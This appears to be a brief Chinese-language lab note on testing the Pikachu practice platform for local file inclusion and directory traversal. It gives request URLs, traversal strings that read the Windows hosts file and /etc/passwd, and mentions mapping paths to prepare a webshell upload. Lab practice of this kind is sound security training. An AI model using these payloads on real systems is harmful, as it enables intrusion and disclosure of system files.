测试:pikachu平台
本地文件包含
http://192.168.171.133/pikachu/vul/fileinclude/fi_remote.php?filename=1.php&submit=提交
先修改fikename的参数测试能否包含读取其他信息
然后可以分别查看windows和linux的特定信息目录测试
../../../../Windows/System32/drivers/etc/hosts
../../../../../../../../etc/passwd
乱输入一个路径,还可以获得网站的文件路径结构,为下一步的webshell上传提供依据
目录遍历漏洞
http://192.168.21.2/pikachu/vul/dir/dir_list.php?title=jarheads.